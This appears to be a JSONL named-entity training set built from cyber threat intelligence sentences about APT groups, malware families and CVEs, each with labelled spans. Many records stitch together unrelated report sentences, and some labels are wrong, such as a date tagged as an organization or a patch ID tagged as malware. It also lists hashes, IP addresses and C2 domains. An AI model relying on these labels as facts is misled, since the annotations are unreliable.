The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors .", "spans": {"THREAT_ACTOR: actors": [[168, 174]], "VULNERABILITY: CVE-2017-0144": [[262, 275]], "MALWARE: MS17-010": [[315, 323]], "THREAT_ACTOR: Ke3chang": [[330, 338]], "ORGANIZATION: aerospace": [[423, 432]], "ORGANIZATION: energy": [[435, 441]], "ORGANIZATION: government": [[444, 454]], "ORGANIZATION: high-tech": [[457, 466]], "ORGANIZATION: consulting services": [[469, 488]], "ORGANIZATION: chemicals": [[491, 500]], "ORGANIZATION: manufacturing": [[503, 516]], "ORGANIZATION: mining sectors": [[519, 533]]}, "info": {"id": "cyberner_stix_train_005791", "source": "cyberner_stix_train"}} {"text": "Instead of running its service only at boot time , it registers a receiver that listens to the “ android.intent.action.SCREEN_ON ” and “ android.provider.Telephony.SMS_DELIVER ” broadcast actions . However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period .", "spans": {"THREAT_ACTOR: actors": [[218, 224]], "THREAT_ACTOR: threat actor group OilRig": [[477, 502]], "MALWARE: Bondupdater": [[519, 530]], "ORGANIZATION: Unit 42": [[541, 548]], "ORGANIZATION: Microsoft": [[585, 594]], "THREAT_ACTOR: OilRig": [[620, 626]]}, "info": {"id": "cyberner_stix_train_005792", "source": "cyberner_stix_train"}} {"text": "The second timer will run every five seconds and it will try to enable the WiFi if it 's disabled . 
Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[100, 115]], "ORGANIZATION: organizations": [[143, 156]], "TOOL: documents": [[235, 244]], "MALWARE: APT37": [[280, 285]], "MALWARE: malware": [[286, 293]]}, "info": {"id": "cyberner_stix_train_005793", "source": "cyberner_stix_train"}} {"text": "In mid-2016 , malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": {"ORGANIZATION: mid-2016": [[3, 11]], "ORGANIZATION: FireEye": [[27, 34]], "THREAT_ACTOR: APT32": [[60, 65]], "ORGANIZATION: hospitality": [[107, 118]], "THREAT_ACTOR: SneakyPastes": [[213, 225]], "ORGANIZATION: embassies": [[230, 239]], "ORGANIZATION: government entities": [[242, 261]], "ORGANIZATION: education": [[264, 273]], "ORGANIZATION: media outlets": [[276, 289]], "ORGANIZATION: activists": [[306, 315]], "ORGANIZATION: personnel": [[339, 348]], "ORGANIZATION: healthcare": [[351, 361]], "ORGANIZATION: banking": [[366, 373]]}, "info": {"id": "cyberner_stix_train_005794", "source": "cyberner_stix_train"}} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "ORGANIZATION: defense contractors": [[223, 242]], "ORGANIZATION: colleges": [[245, 253]], "ORGANIZATION: universities": [[258, 270]], "ORGANIZATION: law firms": [[273, 282]], "ORGANIZATION: political organizations": [[289, 312]], "ORGANIZATION: minority ethnic groups": [[358, 380]]}, "info": {"id": "cyberner_stix_train_005795", "source": "cyberner_stix_train"}} {"text": "It ’ s not enough for this malware family to swap just one innocent application with an infected double . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted . Dexphot also generates the names for the tasks at runtime , which means a simple block list of hardcoded task names will not be effective in preventing them from running . 
Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": {"ORGANIZATION: Arab": [[192, 196]], "ORGANIZATION: Emirates": [[197, 205]], "MALWARE: Dexphot": [[316, 323]], "ORGANIZATION: Southeast Asian government": [[524, 550]], "ORGANIZATION: Central Asian telecom": [[555, 576]]}, "info": {"id": "cyberner_stix_train_005796", "source": "cyberner_stix_train"}} {"text": "The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: .txt": [[109, 113]]}, "info": {"id": "cyberner_stix_train_005797", "source": "cyberner_stix_train"}} {"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ .", "spans": {"THREAT_ACTOR: Lazarus": [[44, 51]], "ORGANIZATION: financial organizations": [[129, 152]], "FILEPATH: ‘Tokyo’": [[219, 226]], "FILEPATH: ‘Yokohama’": [[231, 241]]}, "info": {"id": "cyberner_stix_train_005798", "source": "cyberner_stix_train"}} {"text": "Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": {"THREAT_ACTOR: TG-3390": [[176, 183]]}, "info": {"id": "cyberner_stix_train_005799", "source": "cyberner_stix_train"}} {"text": "Kryptowire says the code , which it found on a BLU R1 HD devices , transmitted fine-grained location information and allowed for the remote installation of other apps . 
KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . Should the user become aware of the infection later , it may be difficult to find the cause due to the fact that the original embedded file contained within the SFX is benign .", "spans": {"ORGANIZATION: Kryptowire": [[0, 10]], "ORGANIZATION: BLU": [[47, 50]], "MALWARE: KHRAT": [[169, 174]], "TOOL: backdoor trojan": [[180, 195]], "THREAT_ACTOR: DragonOK": [[260, 268]]}, "info": {"id": "cyberner_stix_train_005800", "source": "cyberner_stix_train"}} {"text": "In an extensive email to the victim , the INDRIK SPIDER operator provides a decryptor download link , decryptor deletion link ( to be used following decryptor download ) and a password . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[42, 55]], "ORGANIZATION: Kaspersky": [[187, 196]], "THREAT_ACTOR: ScarCruft": [[213, 222]], "VULNERABILITY: zero-day": [[252, 260]], "VULNERABILITY: CVE-2016-0147": [[263, 276]], "ORGANIZATION: Microsoft": [[298, 307]], "TOOL: XML": [[308, 311]]}, "info": {"id": "cyberner_stix_train_005801", "source": "cyberner_stix_train"}} {"text": "One sample in particular , cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df used yet another unique user agent string in combination with the previous user agent for its C2 : Mozilla v5.1 ( Windows NT 6.1 ; rv : 6.0.1 ) Gecko Firefox .", "spans": {"FILEPATH: cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df": [[27, 91]], "TOOL: C2": [[186, 188]], "ORGANIZATION: Mozilla": [[191, 198]], "SYSTEM: Windows": [[206, 213]], "TOOL: Gecko": [[236, 241]], "TOOL: Firefox": [[242, 249]]}, "info": {"id": "cyberner_stix_train_005802", "source": "cyberner_stix_train"}} {"text": "Validating Arabic keyboard and language settings on the infected machine .", "spans": {}, "info": 
{"id": "cyberner_stix_train_005803", "source": "cyberner_stix_train"}} {"text": "Unlike many ransomware operations , which usually just require victims to make the payment and subsequently download a decryptor , INDRIK SPIDER requires the victim to engage in communication with an operator . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: exploit": [[274, 281]], "VULNERABILITY: CVE-2016-4117": [[288, 301]]}, "info": {"id": "cyberner_stix_train_005804", "source": "cyberner_stix_train"}} {"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": {"MALWARE: infpub.dat": [[20, 30]], "MALWARE: specific file": [[47, 60]], "ORGANIZATION: Palo Alto Networks Unit 42": [[111, 137]], "FILEPATH: malicious files": [[185, 200]], "ORGANIZATION: government": [[266, 276]], "ORGANIZATION: MalwareBytes": [[301, 313]]}, "info": {"id": "cyberner_stix_train_005805", "source": "cyberner_stix_train"}} {"text": "Take pictures with the embedded camera . The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks . Part one of this research investigates the Spark campaign , where attackers use social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor . 
With ThreatConnect , teams get a single Platform to simplify the processing , categorization , and response to suspicious emails , reducing the time to remediate active threats from days to minutes .", "spans": {"TOOL: Remsec": [[94, 100]], "TOOL: Backdoor.Remsec": [[103, 118]], "MALWARE: Spark backdoor": [[316, 330]], "TOOL: ThreatConnect": [[338, 351]], "TOOL: Platform": [[373, 381]]}, "info": {"id": "cyberner_stix_train_005806", "source": "cyberner_stix_train"}} {"text": "Once this Intent object is generated with the action value pointing to the decrypted content , the decryption function returns the Intent object to the callee . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident . ZIP archives are supposed to have one “End of Central Directory” (EOCD) signifying the end of the . In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": {"ORGANIZATION: NCC Group 's Incident Response": [[175, 205]], "ORGANIZATION: GReAT": [[352, 357]], "MALWARE: CozyDuke": [[372, 380]]}, "info": {"id": "cyberner_stix_train_005807", "source": "cyberner_stix_train"}} {"text": "These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . 
It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors .", "spans": {"THREAT_ACTOR: criminal groups": [[28, 43]], "THREAT_ACTOR: PoSeidon": [[104, 112]], "VULNERABILITY: Carbanak": [[148, 156]], "THREAT_ACTOR: criminal organization": [[174, 195]], "THREAT_ACTOR: Carbon Spider": [[208, 221]], "THREAT_ACTOR: Turla": [[251, 256]], "MALWARE: fake Flash installers": [[268, 289]]}, "info": {"id": "cyberner_stix_train_005808", "source": "cyberner_stix_train"}} {"text": "While computers using Microsoft Windows automatically adjust for DST , changes in timezone definitions require that an update to Windows be installed .", "spans": {"ORGANIZATION: Microsoft": [[22, 31]], "SYSTEM: Windows": [[32, 39], [129, 136]]}, "info": {"id": "cyberner_stix_train_005809", "source": "cyberner_stix_train"}} {"text": "In the case of the infected application not specified in the code , “ Agent Smith ” will simply show ads on the activity being loaded . Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests . The two monitoring services simultaneously check the status of all three malicious processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": {"MALWARE: Agent Smith": [[70, 81]], "THREAT_ACTOR: Clever Kitten": [[136, 149]]}, "info": {"id": "cyberner_stix_train_005810", "source": "cyberner_stix_train"}} {"text": "Bluetooth — which allows the interaction with the Bluetooth interface , and net/deacon — which implements a beaconing system based on UDP . In early 2016 , the Callisto Group was observed sending targeted spear phishing emails . Based on past APT12 activity , we expect the threat group to continue to utilize phishing as a malware delivery method . 
0824.1.doc : f6fafb7c30b1114befc93f39d0698560 , CVE-2012-0158 . Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": {"THREAT_ACTOR: APT12": [[243, 248]], "FILEPATH: 0824.1.doc": [[350, 360]], "FILEPATH: f6fafb7c30b1114befc93f39d0698560": [[363, 395]], "VULNERABILITY: CVE-2012-0158": [[398, 411]]}, "info": {"id": "cyberner_stix_train_005811", "source": "cyberner_stix_train"}} {"text": "Those targeted include applications like Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . APT40 relies heavily on web shells for an initial foothold into an organization .", "spans": {"SYSTEM: Paypal Business": [[41, 56]], "SYSTEM: Revolut": [[59, 66]], "SYSTEM: Barclays": [[69, 77]], "SYSTEM: UniCredit": [[80, 89]], "SYSTEM: CapitalOne UK": [[92, 105]], "SYSTEM: HSBC UK": [[108, 115]], "SYSTEM: Santander UK": [[118, 130]], "SYSTEM: TransferWise": [[133, 145]], "SYSTEM: Coinbase": [[148, 156]], "SYSTEM: paysafecard": [[159, 170]], "TOOL: Java related application": [[225, 249]], "MALWARE: Java file": [[337, 346]], "THREAT_ACTOR: APT40": [[349, 354]], "MALWARE: web shells": [[373, 383]]}, "info": {"id": "cyberner_stix_train_005812", "source": "cyberner_stix_train"}} {"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing 
, the functionality of most of the Western versions of Riltok Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . In this version , the developer used a different API , the Wininet API which make more sense for Web requests .", "spans": {"SYSTEM: Google Play": [[75, 86]], "ORGANIZATION: Kaspersky": [[550, 559]], "MALWARE: backdoor": [[577, 585]], "THREAT_ACTOR: Turla": [[630, 635]], "TOOL: Wininet API": [[697, 708]]}, "info": {"id": "cyberner_stix_train_005813", "source": "cyberner_stix_train"}} {"text": "Even though we could not find indications of being in use , two stand out . In October 2015 , the Callisto Group was observed sending targeted credential phishing emails . FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases . Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": {"THREAT_ACTOR: Callisto Group": [[98, 112]], "ORGANIZATION: FireEye": [[172, 179]], "THREAT_ACTOR: APT12": [[189, 194]], "TOOL: emails": [[240, 246]]}, "info": {"id": "cyberner_stix_train_005814", "source": "cyberner_stix_train"}} {"text": "Users may be required the help of their device manufacturer to get support for firmware flashing . In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets . 
To resolve that issue , The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": {"THREAT_ACTOR: Cobalt Group": [[141, 153]], "TOOL: Cobalt Strike": [[204, 217]], "ORGANIZATION: Harrison": [[304, 312], [406, 414]], "ORGANIZATION: Ashley Madison": [[353, 367]]}, "info": {"id": "cyberner_stix_train_005815", "source": "cyberner_stix_train"}} {"text": "If you take a look at the below PowerShell , you ’ll quickly understand why .", "spans": {"TOOL: PowerShell": [[32, 42]]}, "info": {"id": "cyberner_stix_train_005816", "source": "cyberner_stix_train"}} {"text": "To reach this conclusion , we began by analyzing the apparent objectives and motivations of the group .", "spans": {}, "info": {"id": "cyberner_stix_train_005817", "source": "cyberner_stix_train"}} {"text": "Islamawazi is also known as the Turkistan Islamic Party or “ TIP ” . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . However , three themes in APT28 's targeting clearly reflects LOCs of specific interest to an Eastern European government , most likely the Russian government .", "spans": {"SYSTEM: Islamawazi": [[0, 10]], "ORGANIZATION: Turkistan Islamic Party": [[32, 55]], "THREAT_ACTOR: APT41": [[125, 130]], "THREAT_ACTOR: APT28": [[300, 305]], "ORGANIZATION: government": [[385, 395]], "ORGANIZATION: Russian government": [[414, 432]]}, "info": {"id": "cyberner_stix_train_005818", "source": "cyberner_stix_train"}} {"text": "“ jackhex ” is not a common word or phrase and , as noted above , was also seen in the beacon activity with the previously discussed 9002 sample . 
BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) .", "spans": {"MALWARE: 9002": [[133, 137]], "MALWARE: BalkanRAT": [[147, 156]], "MALWARE: BalkanDoor": [[267, 277]], "THREAT_ACTOR: OceanLotus": [[383, 393]], "THREAT_ACTOR: APT32": [[410, 415]]}, "info": {"id": "cyberner_stix_train_005819", "source": "cyberner_stix_train"}} {"text": "Here are some of the Seduploader features :", "spans": {"MALWARE: Seduploader": [[21, 32]]}, "info": {"id": "cyberner_stix_train_005820", "source": "cyberner_stix_train"}} {"text": "Svpeng is capable of doing lots of things . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets . For any inquiries , contact us at threatintel@eset.com . An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": {"MALWARE: Svpeng": [[0, 6]], "THREAT_ACTOR: Turla": [[44, 49]]}, "info": {"id": "cyberner_stix_train_005821", "source": "cyberner_stix_train"}} {"text": "It will also report the version of Android that the phone is running and any additional capabilities . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . 
Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"SYSTEM: Android": [[35, 42]], "THREAT_ACTOR: ITG08": [[227, 232]], "THREAT_ACTOR: FIN6": [[249, 253]], "THREAT_ACTOR: APT37": [[268, 273]], "ORGANIZATION: company": [[304, 311]]}, "info": {"id": "cyberner_stix_train_005822", "source": "cyberner_stix_train"}} {"text": "With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": {"TOOL: GozNym": [[5, 11]], "ORGANIZATION: bank": [[62, 66]], "TOOL: URL": [[70, 73]], "TOOL: SSL certificate": [[78, 93]], "MALWARE: PlugX DLL": [[121, 130]]}, "info": {"id": "cyberner_stix_train_005823", "source": "cyberner_stix_train"}} {"text": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim 's network by copying itself over network shares . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website .", "spans": {"THREAT_ACTOR: Kwampirs": [[0, 8]], "MALWARE: MoonWind samples": [[170, 186]], "TOOL: C2": [[202, 204]], "MALWARE: legitimate website": [[271, 289]]}, "info": {"id": "cyberner_stix_train_005824", "source": "cyberner_stix_train"}} {"text": "Generic Windows Defender ATP detections trigger alerts on FinFisher behavior While our analysis has allowed us to immediately protect our customers , we ’ d like to share our insights and add to the growing number of published analyses by other talented researchers ( listed below this blog post ) . The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes . 
Perhaps the attackers are trying to reduce the load from their C&C servers by avoiding callbacks from uninteresting victims . The domain name was created on the same day the ad appeared and the website is a copy of the real one .", "spans": {"SYSTEM: Windows Defender ATP": [[8, 28]], "MALWARE: FinFisher": [[58, 67]], "THREAT_ACTOR: threat group": [[315, 327]], "THREAT_ACTOR: DRAGONFISH": [[335, 345]], "THREAT_ACTOR: Lotus Blossom": [[349, 362]], "TOOL: Elise malware": [[394, 407]], "THREAT_ACTOR: espionage": [[436, 445]]}, "info": {"id": "cyberner_stix_train_005825", "source": "cyberner_stix_train"}} {"text": "The group primarily uses the MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: MSR 606 Software": [[29, 45]], "TOOL: Hardware": [[62, 70]], "ORGANIZATION: Symantec": [[123, 131]], "ORGANIZATION: customers": [[234, 243]]}, "info": {"id": "cyberner_stix_train_005826", "source": "cyberner_stix_train"}} {"text": "This period started with their seeming disappearance in October 2018 and concluded with their return in April 2019 . he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"THREAT_ACTOR: PassCV": [[120, 126]], "MALWARE: RATs": [[171, 175]]}, "info": {"id": "cyberner_stix_train_005827", "source": "cyberner_stix_train"}} {"text": "Check Point Mobile Threat Prevention has detected two instances of a mobile malware variant infecting multiple devices within the Check Point customer base . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences .", "spans": {"ORGANIZATION: Check Point": [[0, 11], [130, 141]], "SYSTEM: Mobile Threat Prevention": [[12, 36]], "THREAT_ACTOR: attackers": [[172, 181]], "MALWARE: MS PowerPoint document": [[190, 212]], "VULNERABILITY: CVE-2014-6352": [[238, 251]], "THREAT_ACTOR: APT10": [[254, 259]], "ORGANIZATION: MSPs": [[329, 333]]}, "info": {"id": "cyberner_stix_train_005828", "source": "cyberner_stix_train"}} {"text": "Upon start , it creates a window with the class name “ Hello ” and title “ Program ” , subscribes for device arrival notifications for that window and enters a standard Windows message processing loop .", "spans": {"SYSTEM: Windows": [[169, 176]]}, "info": {"id": "cyberner_stix_train_005829", "source": "cyberner_stix_train"}} {"text": "Clicking on thenotification will result in launching a specified app startApp Starts the specified application getInstallApps Gets the list of installedapplications on the infected device getContacts Gets the contact names and phone numbers from the addressbook on the infected device deleteApplication Triggers the deletion of the specified application forwardCall Enables call forwarding to the specified number sendSms Sends a text message with specified text from the infecteddevice to the specified phone number startInject Triggers the overlay attack against the specified application startUssd The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking . 
BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics .", "spans": {"THREAT_ACTOR: SectorJ04": [[605, 614]], "TOOL: ServHelper": [[654, 664]], "TOOL: FlawedAmmy RAT": [[669, 683]], "THREAT_ACTOR: BlackOasis": [[700, 710]], "ORGANIZATION: politics": [[779, 787]]}, "info": {"id": "cyberner_stix_train_005830", "source": "cyberner_stix_train"}} {"text": "Results from the commands systeminfo and tasklist Current execution path Capture screenshot Drive enumeration Drive serial number .", "spans": {}, "info": {"id": "cyberner_stix_train_005831", "source": "cyberner_stix_train"}} {"text": "The screenshots provided by the author align with the advertised features and the features that we discovered while doing our analysis . Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest . The goal of the attack was to surgically target an unknown pool of users , which were identified by their network adapters’ MAC addresses . It is a challenge for any organisation to fight off a determined ransomware gang like Vice Society , but schools face the added pressure of doing so in a notoriously tight budgetary environment .", "spans": {"ORGANIZATION: network": [[209, 216]], "THREAT_ACTOR: ransomware gang": [[486, 501]], "THREAT_ACTOR: Vice Society": [[507, 519]], "ORGANIZATION: schools": [[526, 533]]}, "info": {"id": "cyberner_stix_train_005832", "source": "cyberner_stix_train"}} {"text": "Influence operations , also frequently called “ information operations , ” have a long history of inclusion in Russian strategic doctrine , and have been intentionally developed , deployed , and modernized with the advent of the internet .", "spans": {}, "info": {"id": "cyberner_stix_train_005833", "source": "cyberner_stix_train"}} {"text": "Check Point Software Hummingbad/Shedun infections by Android version . 
In November 2017 , Secureworks Counter Threat Unit™ ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company . APT33 : 217.147.168.44 remserver.ddns.net . Establish robust network segmentation between MicroSCADA hosts and IT networks .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: Hummingbad/Shedun": [[21, 38]], "SYSTEM: Android": [[53, 60]], "ORGANIZATION: Secureworks Counter Threat Unit™": [[90, 122]], "ORGANIZATION: CTU": [[125, 128]], "THREAT_ACTOR: cyber threat group": [[171, 189]], "THREAT_ACTOR: Lazarus Group": [[201, 214]], "THREAT_ACTOR: NICKEL ACADEMY": [[241, 255]], "ORGANIZATION: Secureworks": [[259, 270]], "ORGANIZATION: cryptocurrency company": [[390, 412]], "THREAT_ACTOR: APT33": [[415, 420]], "IP_ADDRESS: 217.147.168.44": [[423, 437]], "DOMAIN: remserver.ddns.net": [[438, 456]]}, "info": {"id": "cyberner_stix_train_005834", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : get.adobe.go-microstf.com .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: get.adobe.go-microstf.com": [[11, 36]]}, "info": {"id": "cyberner_stix_train_005835", "source": "cyberner_stix_train"}} {"text": "In both cases , the executable file was a self-extracting executable containing PoisonIvy , a common backdoor Trojan developed by a Chinese speaker .", "spans": {"MALWARE: PoisonIvy": [[80, 89]], "MALWARE: Trojan": [[110, 116]]}, "info": {"id": "cyberner_stix_train_005836", "source": "cyberner_stix_train"}} {"text": "The same numerical code corresponded to one command in different versions , but the set of supported commands varied . TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter . 
These routines are indicative of the group ’s aim to get quantitative returns through varied cybercriminal profit streams . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": {"THREAT_ACTOR: TG-3390": [[119, 126]], "TOOL: OwaAuth web shell": [[152, 169]], "ORGANIZATION: Volexity": [[370, 378]], "MALWARE: Dukes": [[394, 399]], "MALWARE: PowerDuke": [[582, 591]]}, "info": {"id": "cyberner_stix_train_005837", "source": "cyberner_stix_train"}} {"text": "We found the same Quasar code in an additional attack on the same day , but upon a different target .", "spans": {"MALWARE: Quasar": [[18, 24]]}, "info": {"id": "cyberner_stix_train_005838", "source": "cyberner_stix_train"}} {"text": "Written by Jagadeesh Chandraiah JULY 23 , 2018 SophosLabs has uncovered a mobile malware distribution campaign that uses advertising placement to distribute the Red Alert Trojan , linking counterfeit branding of well-known apps to Web pages that deliver an updated , 2.0 version of this bank credential thief . In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) . Config.ini is the file where the malware stores its encrypted configuration data.List of files to send to C2 using bitsadmin.exe from the dedicated thread: upLog.txt , upSCRLog.txt , upSpecial.txt , upFile.txt , upMSLog.txt . http://108.61.189.174 control server HTTP . 
The primary motivation of a hacker is money , and getting it can be done with a variety of methods .", "spans": {"ORGANIZATION: SophosLabs": [[47, 57]], "MALWARE: Red Alert Trojan": [[161, 177]], "THREAT_ACTOR: APT37": [[321, 326]], "ORGANIZATION: company": [[353, 360]], "ORGANIZATION: telecommunications service": [[439, 465]], "FILEPATH: Config.ini": [[512, 522]], "TOOL: C2": [[618, 620]], "FILEPATH: bitsadmin.exe": [[627, 640]], "FILEPATH: upLog.txt": [[668, 677]], "FILEPATH: upSCRLog.txt": [[680, 692]], "FILEPATH: upSpecial.txt": [[695, 708]], "FILEPATH: upFile.txt": [[711, 721]], "FILEPATH: upMSLog.txt": [[724, 735]], "URL: http://108.61.189.174": [[738, 759]], "THREAT_ACTOR: hacker": [[810, 816]]}, "info": {"id": "cyberner_stix_train_005839", "source": "cyberner_stix_train"}} {"text": "If it ’ s not 0x1B ( for 32-bit systems ) or 0x23 ( for 32-bit system under Wow64 ) , the loader exits . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt . Winnti : T1079 Multilayer Encryption . “ lun.vbs ” , which runs n.bat", "spans": {"TOOL: custom dropper": [[158, 172]], "MALWARE: MagicHound.DropIt": [[200, 217]], "THREAT_ACTOR: Winnti": [[220, 226]]}, "info": {"id": "cyberner_stix_train_005840", "source": "cyberner_stix_train"}} {"text": "As the Play Store has introduced new policies and Google Play Protect has scaled defenses , Bread apps were forced to continually iterate to search for gaps . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy . This trick renders identification by firewall more cumbersome . 
In general terms , spyware is software that can be installed on a device and used to monitor activity and/or capture potentially sensitive data .", "spans": {"SYSTEM: Play Store": [[7, 17]], "SYSTEM: Google Play Protect": [[50, 69]], "MALWARE: Bread": [[92, 97]], "THREAT_ACTOR: Anchor Panda": [[168, 180]], "ORGANIZATION: CrowdStrike": [[202, 213]], "TOOL: firewall": [[461, 469]], "MALWARE: spyware": [[507, 514]]}, "info": {"id": "cyberner_stix_train_005841", "source": "cyberner_stix_train"}} {"text": "EventBot Obfuscated class names Obfuscated class names using letters of the alphabet . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: SWAnalytics": [[111, 122]], "MALWARE: Mia Ash": [[250, 257]], "THREAT_ACTOR: actors": [[322, 328]]}, "info": {"id": "cyberner_stix_train_005842", "source": "cyberner_stix_train"}} {"text": "The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data . 
